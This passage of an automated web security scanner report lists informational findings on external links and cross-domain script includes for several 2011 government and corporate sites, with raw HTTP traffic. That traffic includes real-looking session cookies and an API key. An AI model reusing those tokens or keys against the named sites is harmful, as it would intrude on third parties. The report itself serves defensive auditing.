<p>                                                            MassDOT blog: <a title="http://transportation.blog.state.ma.us/blog/" href="http://transportation.blog.state.ma.us/blog/" target="0">http://transportation.blog.state.ma.us/blog/</a>, or on Twitter: <a title="http://twitter.com/MassDOT" href="http://twitter.com/MassDOT" target="0">http://twitter.com/MassDOT</a>
...[SNIP]...
<br>Traffic cameras: <a title="http://www1.eot.state.ma.us/" href="http://www1.eot.state.ma.us/" target="0">http://www1.eot.state.ma.us/</a>
...[SNIP]...
<br>Logan updates: <a title="http://www.massport.com/logan-airport/Pages/Default.aspx" href="http://www.massport.com/logan-airport/Pages/Default.aspx" target="0">http://www.massport.com/logan-airport/Pages/Default.aspx</a>, or on Twitter: <a title="http://twitter.com/BostonLogan" href="http://twitter.com/BostonLogan" target="0">http://twitter.com/BostonLogan</a>
...[SNIP]...
<br>MBTA Service alerts: <a title="http://www.mbta.com/rider_tools/transit_updates/" href="http://www.mbta.com/rider_tools/transit_updates/" target="0">http://www.mbta.com/rider_tools/transit_updates/</a> or on Twitter: <a title="http://twitter.com/mbtaGM" href="http://twitter.com/mbtaGM" target="0">http://twitter.com/mbtaGM</a>
...[SNIP]...
<p>                                                            National Weather Service in Taunton: <a title="http://www.erh.noaa.gov/box/" href="http://www.erh.noaa.gov/box/" target="1">http://www.erh.noaa.gov/box/</a>
...[SNIP]...
<br>National Weather Service in Albany: <a title="http://www.erh.noaa.gov/er/aly/" href="http://www.erh.noaa.gov/er/aly/" target="0">http://www.erh.noaa.gov/er/aly/</a>
...[SNIP]...
<li><a href="http://twitter.com/massema" title="<img src=/Eeops/images/t_logo.jpg> Follow us on Twitter - Mass EMA"><img src=/Eeops/images/t_logo.jpg>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Framingham-MA/Massachusetts-Emergency-Management-Agency/190278737330" title="<img src=/Eeops/images/f_logo.jpg> Friend us on Facebook"><img src=/Eeops/images/f_logo.jpg>
...[SNIP]...
<li><a href="http://www.ready.gov" title="<font color="#006600"><strong>Ready.Gov</strong></font"><font color="#006600">
...[SNIP]...
<li><a href="http://www.massvoad.org" title="Massachusetts Voluntary Organizations Active in Disaster ">Massachusetts Voluntary Organizations Active in Disaster </a>
...[SNIP]...

16.26. http://www.mass.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mass.gov
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.mass.gov/?pageID=ocasubtopic&L=4&L0=Home&L1=Consumer&L2=Housing+Information&L3=Foreclosure+Resources&sid=Eoca

The response contains the following links to other domains:

http://www.foreclosurehelpandhope.org/?gclid=CKTzs43nqZYCFQxxHgodODAzyg
http://youtu.be/D21CafX87Q4

Request

GET /?pageID=ocasubtopic&L=4&L0=Home&L1=Consumer&L2=Housing+Information&L3=Foreclosure+Resources&sid=Eoca HTTP/1.1
Host: www.mass.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mass.gov/?pageID=mg2homepage&L=1&L0=Home&sid=massgov2
Cookie: fsr.s={"v":1,"rid":"1310517722924_648675","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","cp":{"massgov2":"Visited","Deas":"No","Eveterans":"No","Eelders":"No","Eeohhs2":"No","Eoca":"No","Dmdaa":"No","Sessex":"No","Cago":"No","Eeops":"Visited","Aosc":"No","Ador":"No","Agov3":"No","Ihqcc":"No","Elwd":"No","Ehed":"No","Smsa":"No","Idppc":"No","Ctre":"No","Eeoe":"No","Eoeea":"No","Dber":"No","Eoaf":"No","Ieth":"No","Fstim":"No"},"pv":2,"to":5,"c":"http://www.mass.gov/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1310517726738}; __utma=255208596.1158802016.1310517723.1310517723.1310517723.1; __utmb=255208596.2.10.1310517723; __utmc=255208596; __utmz=255208596.1310517723.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:44:54 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:49:54 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17786

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<li><a href="http://www.foreclosurehelpandhope.org/?gclid=CKTzs43nqZYCFQxxHgodODAzyg" title="Foreclosure Counseling (NeighborWorks)">Foreclosure Counseling (NeighborWorks)</a>
...[SNIP]...
ef to eligible homeowners who have experienced a drop in income of at least 15%, resulting from involuntary unemployment or underemployment due to economic conditions and/or a medical emergency. Click <a href="http://youtu.be/D21CafX87Q4">here</a>
...[SNIP]...

16.27. http://www.mass.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mass.gov
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.mass.gov/?pageID=mg2homepage&L=1&L0=Home&sid=massgov2

The response contains the following links to other domains:

http://public.dep.state.ma.us/MassAir/Pages/MapForecast.aspx?&ht=1&hi=108
http://transportation.blog.state.ma.us/blog/2011/07/medford-i-93-bridges-july-15-18-construction.html
http://usa.gov/
http://www.mahealthconnector.org/
http://www.malegislature.gov/
http://www.malegislature.gov/Laws/Search
http://www.massdot.state.ma.us/rmv/
http://www.massitsallhere.com/
http://www.masslottery.com/games/lottery/winning-numbers.html
http://www.massvacation.com/
http://www.nfpa.org/assets/files/PDF/modelfireworks.pdf
http://www.sec.state.ma.us/
https://wfb.dor.state.ma.us/webfile/wsi/

Request

GET /?pageID=mg2homepage&L=1&L0=Home&sid=massgov2 HTTP/1.1
Host: www.mass.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mass.gov/404/error.html
Cookie: fsr.s={"v":1,"rid":"1310517722924_648675","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","cp":{"massgov2":"No","Deas":"No","Eveterans":"No","Eelders":"No","Eeohhs2":"No","Eoca":"No","Dmdaa":"No","Sessex":"No","Cago":"No","Eeops":"Visited","Aosc":"No","Ador":"No","Agov3":"No","Ihqcc":"No","Elwd":"No","Ehed":"No","Smsa":"No","Idppc":"No","Ctre":"No","Eeoe":"No","Eoeea":"No","Dber":"No","Eoaf":"No","Ieth":"No","Fstim":"No"},"pv":1,"to":3,"c":"http://www.mass.gov/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1310517726738}; __utma=255208596.1158802016.1310517723.1310517723.1310517723.1; __utmb=255208596.1.10.1310517723; __utmc=255208596; __utmz=255208596.1310517723.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:44:39 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:49:39 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 41209

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
   <meta http-equiv="Content-Type" content="text/
...[SNIP]...
<li><a href="http://transportation.blog.state.ma.us/blog/2011/07/medford-i-93-bridges-july-15-18-construction.html" title="Medford I-93 Bridges: July 15-18 Construction">Medford I-93 Bridges: July 15-18 Construction</a>
...[SNIP]...
<div class="linkimage">    <a href="http://www.massitsallhere.com" onClick="javascript: pageTracker._trackPageview('/sim/allhere2');"><img src="/massgov2/images/module_its_all_here.gif" width="158" height="79" alt="Massachusetts .. It..s All Here. Work. Play. Live. Grow. Study." />
...[SNIP]...
<li><a href="http://www.mahealthconnector.org" title="Find health insurance">Find health insurance</a>
...[SNIP]...
<li><a href="http://www.masslottery.com/games/lottery/winning-numbers.html" title="Mass. Lottery winning numbers">Mass. Lottery winning numbers</a>
...[SNIP]...
<li><a href="http://www.massdot.state.ma.us/rmv/" title="Registry of Motor Vehicles (RMV) Online Branch">Registry of Motor Vehicles (RMV) Online Branch</a>
...[SNIP]...
<li><a href="http://www.malegislature.gov/Laws/Search" title="Search the Massachusetts General Laws (M.G.L.)">Search the Massachusetts General Laws (M.G.L.)</a>
...[SNIP]...
<li><a href="http://public.dep.state.ma.us/MassAir/Pages/MapForecast.aspx?&ht=1&hi=108" title="Check daily air quality forecast">Check daily air quality forecast</a>
...[SNIP]...
<li><a href="https://wfb.dor.state.ma.us/webfile/wsi/" title="Check the status of your state tax refund">Check the status of your state tax refund</a>
...[SNIP]...
</a> for information on the open enrollment rules.  The <a href="http://www.mahealthconnector.org/">Health Connector</a>
...[SNIP]...
</strong>The use of fireworks except by licensed professionals is strictly prohibited in Massachusetts which has adopted the <a href="http://www.nfpa.org/assets/files/PDF/modelfireworks.pdf">Model Fireworks Law</a>
...[SNIP]...
<div class="linkimage"><a href="http://www.massvacation.com/" onClick="javascript: pageTracker._trackPageview('/sim/mott2');"><img src="/massgov2/images/massgov_tourism.gif" width="158" height="74" alt="Massachusetts – It’s all here (Office of Travel and Tourism)" />
...[SNIP]...
<li><a href="http://www.sec.state.ma.us/">Secretary of State</a>
...[SNIP]...
<li><a href="http://www.malegislature.gov/">Legislature</a>
...[SNIP]...
<li class="toplevel"><a href="http://USA.gov/">Federal Government</a>
...[SNIP]...

16.28. http://www.ox.popcap.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ox.popcap.com
Path:	/delivery/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.ox.popcap.com/delivery/afr.php?show=true&cb=53926843&zoneid=85&lcid=1033&ref=http://www.popcap.com/

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js

Request

Response

16.29. https://www.ri.gov/information/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/information/

Issue detail

The page was loaded from a URL containing a query string:

https://www.ri.gov/information/?tags=starting+a+business

The response contains the following link to another domain:

https://server.iad.liveperson.net/hc/12733886/?cmd=repstate&site=12733886&channel=web&ver=1&imageUrl=https://www.ri.gov/img/liveperson/

Request

GET /information/?tags=starting+a+business HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:46:18 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 17266
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...
<span><img src="https://server.iad.liveperson.net/hc/12733886/?cmd=repstate&site=12733886&channel=web&ver=1&imageUrl=https://www.ri.gov/img/liveperson/" name='hcIcon' border=0 alt="chat" class="livehelp"></span>
...[SNIP]...

16.30. https://www.ri.gov/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

https://www.ri.gov/search/?q=xss

The response contains the following link to another domain:

https://server.iad.liveperson.net/hc/12733886/?cmd=repstate&site=12733886&channel=web&ver=1&imageUrl=https://www.ri.gov/img/liveperson/

Request

GET /search/?q=xss HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/Licensing/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:14 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 15145
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...
<span><img src="https://server.iad.liveperson.net/hc/12733886/?cmd=repstate&site=12733886&channel=web&ver=1&imageUrl=https://www.ri.gov/img/liveperson/" name='hcIcon' border=0 alt="chat" class="livehelp"></span>
...[SNIP]...

16.31. https://www.ri.gov/visit/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/visit/

Issue detail

The page was loaded from a URL containing a query string:

https://www.ri.gov/visit/?tags=beaches

The response contains the following link to another domain:

https://server.iad.liveperson.net/hc/12733886/?cmd=repstate&site=12733886&channel=web&ver=1&imageUrl=https://www.ri.gov/img/liveperson/

Request

GET /visit/?tags=beaches HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/visit/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:58 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 19852
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...
<span><img src="https://server.iad.liveperson.net/hc/12733886/?cmd=repstate&site=12733886&channel=web&ver=1&imageUrl=https://www.ri.gov/img/liveperson/" name='hcIcon' border=0 alt="chat" class="livehelp"></span>
...[SNIP]...

17. Cross-domain script include previous next
There are 31 instances of this issue:

http://511.dot.ri.gov/hb/main.jsf
http://blog.katango.com/
http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/
http://itunes.apple.com/us/app/katango/id447742732
https://store.popcap.com/payment.php
http://trustedcs.com/
http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html
http://trustedcs.com/SecurityBlanket/SecurityBlanket.html
http://trustedcs.com/products/cross_domain.html
http://www.akqa.com/
http://www.akqa.com/approach
http://www.akqa.com/contact/san-francisco
http://www.akqa.com/library/js/akqa.devicemanager.js
http://www.akqa.com/work/volkswagen/real-racing-gti
http://www.akqa.com/work/warner-brothers/221b
http://www.ccbill.com/
http://www.ccbill.com/developers/faq.php
http://www.ccbill.com/developers/index.php
http://www.ccbill.com/developers/security/security-rewards-program.php
http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php
https://www.ccbill.com/developers/index.php
https://www.ccbill.com/developers/security/vulnerability-reward-registration.php
http://www.facebook.com/plugins/likebox.php
http://www.interactivemediaawards.com/winners/certificate.asp
http://www.jpmorgan.com/pages/jpmorgan/am/usa
http://www.jpmorganchase.com/corporate/Home/home.htm
http://www.ox.popcap.com/delivery/afr.php
http://www.ri.gov/press/view/14202
http://www.riema.ri.gov/
http://www.youtube.com/embed/IHmPw1HsCe4
http://www6.homedepot.com/how-to/index.html

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

17.1. http://511.dot.ri.gov/hb/main.jsf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://511.dot.ri.gov
Path:	/hb/main.jsf

Issue detail

The response dynamically includes the following script from another domain:

http://maps.google.com/maps?file=api&v=2.193&key=ABQIAAAA3Ra69iOARy4wH8CItwTwwhT9d0JBmTIxU6WnnLh7LGBluRlYKBSh_YOZH1WeZPlmIEMMHC9SEojAHQ

Request

GET /hb/main.jsf HTTP/1.1
Host: 511.dot.ri.gov
Proxy-Connection: keep-alive
Referer: http://www2.tmc.state.ri.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7AAAE4CFA20D02FA44A642301503BF8A; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; RhodeIslandNGWeb=1679163402.20480.0000

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
X-Powered-By: JSF/1.2
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Wed, 13 Jul 2011 00:33:09 GMT
Vary: Accept-Encoding
Content-Length: 161756
Connection: Keep-Alive

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns=
...[SNIP]...
<link title="legendMaximizedCSS" rel="stylesheet" type="text/css" href="css/legend-maximized.css">

<script src="http://maps.google.com/maps?file=api&v=2.193&key=ABQIAAAA3Ra69iOARy4wH8CItwTwwhT9d0JBmTIxU6WnnLh7LGBluRlYKBSh_YOZH1WeZPlmIEMMHC9SEojAHQ" type="text/javascript"></script>
...[SNIP]...

17.2. http://blog.katango.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.katango.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://s.gravatar.com/js/gprofiles.js?w&ver=MU
http://s.stats.wordpress.com/w.js?19
http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1308958504g&ver=1.6.1
http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1308958524g&ver=MU
http://s1.wp.com/wp-includes/js/l10n.js?m=1308958505g&ver=20101110
http://wordpress.com/remote-login.php?action=js&host=blog.katango.com&id=23438874&t=1310503373&back=blog.katango.com%2F

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:46:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Tue, 12 Jul 2011 20:42:54 +0000
Cache-Control: max-age=60, must-revalidate
Vary: Cookie
Set-Cookie: hiab=nnascar; path=/; domain=blog.katango.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://blog.katango.com/xmlrpc.php
Link: <http://wp.me/1Alwm>; rel=shortlink
X-nananana: Batcache
Content-Length: 59758

<!DOCTYPE html>



<html dir="ltr" lang="en">
<!--<![e
...[SNIP]...
<link rel="pingback" href="http://blog.katango.com/xmlrpc.php" />
<script src='http://wordpress.com/remote-login.php?action=js&host=blog.katango.com&id=23438874&t=1310503373&back=blog.katango.com%2F' type="text/javascript"></script>
...[SNIP]...
<link rel='stylesheet' id='sharedaddy-css' href='http://s1.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.css?m=1308958522g&ver=MU' type='text/css' media='all' />
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/l10n.js?m=1308958505g&ver=20101110'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1308958504g&ver=1.6.1'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?w&ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1308958524g&ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

17.3. http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.katango.com
Path:	/2011/07/05/how-facebook-affects-your-relationships-infographic/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://platform.linkedin.com/in.js
http://s.gravatar.com/js/gprofiles.js?w&ver=MU
http://s.stats.wordpress.com/w.js?19
http://s0.wp.com/wp-content/mu-plugins/highlander-comments/script.js?m=1309455922g&ver=20110616d
http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1305851052g&ver=1.6.1
http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1305851056g&ver=MU
http://s1.wp.com/wp-includes/js/comment-reply.js?m=1305851052g&ver=20090102
http://s1.wp.com/wp-includes/js/l10n.js?m=1305851052g&ver=20101110
http://s2.wp.com/wp-content/mu-plugins/akismet-2.5/form.js?m=1308783980g&ver=1
http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.js?m=1308095307g&ver=0.2
http://wordpress.com/remote-login.php?action=js&host=blog.katango.com&id=23438874&t=1310503627&back=blog.katango.com%2F2011%2F07%2F05%2Fhow-facebook-affects-your-relationships-infographic%2F

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://blog.katango.com/xmlrpc.php
Link: <http://wp.me/p1Alwm-6p>; rel=shortlink
Content-Length: 31215

<!DOCTYPE html>



<html dir="ltr" lang="en">
<!--<![e
...[SNIP]...
<link rel="pingback" href="http://blog.katango.com/xmlrpc.php" />
<script src='http://wordpress.com/remote-login.php?action=js&host=blog.katango.com&id=23438874&t=1310503627&back=blog.katango.com%2F2011%2F07%2F05%2Fhow-facebook-affects-your-relationships-infographic%2F' type="text/javascript"></script>
...[SNIP]...
<link rel='stylesheet' id='sharedaddy-css' href='http://s1.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.css?m=1308095307g&ver=MU' type='text/css' media='all' />
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/l10n.js?m=1305851052g&ver=20101110'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1305851052g&ver=1.6.1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/comment-reply.js?m=1305851052g&ver=20090102'></script>
...[SNIP]...
<li class="share-linkedin share-regular"><script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</p><script type='text/javascript' src='http://s2.wp.com/wp-content/mu-plugins/akismet-2.5/form.js?m=1308783980g&ver=1'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?w&ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1305851056g&ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/mu-plugins/highlander-comments/script.js?m=1309455922g&ver=20110616d'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.js?m=1308095307g&ver=0.2'></script>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

17.4. http://itunes.apple.com/us/app/katango/id447742732 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/us/app/katango/id447742732

Issue detail

The response dynamically includes the following scripts from other domains:

http://r.mzstatic.com/htmlResources/9326/web-storefront-base.jsz
http://r.mzstatic.com/htmlResources/9326/web-storefront-preview.jsz

Request

Response

17.5. https://store.popcap.com/payment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/payment.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://secure.quantserve.com/quant.js
https://www.digicert.com/custsupport/sealtable.php?order_id=00198171&seal_type=a&seal_size=large&seal_color=green&new=1

Request

Response

17.6. http://trustedcs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?383ED628-AF06-4463-81DC-7F3477CEDFC3
http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js

Request

GET / HTTP/1.1
Host: trustedcs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:00 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 18:05:27 GMT
ETag: "1d7a31-5e13-4e0cbae7"
Accept-Ranges: bytes
Content-Length: 24083
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>RAYTHEON TRUSTED
...[SNIP]...
</div>
<script src="http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?383ED628-AF06-4463-81DC-7F3477CEDFC3" type="text/javascript"></script>
<script src="http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js" type="text/javascript"></script>
...[SNIP]...

17.7. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/SecurityBlanket/SecurityBlanket-FAQ.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?383ED628-AF06-4463-81DC-7F3477CEDFC3
http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js

Request

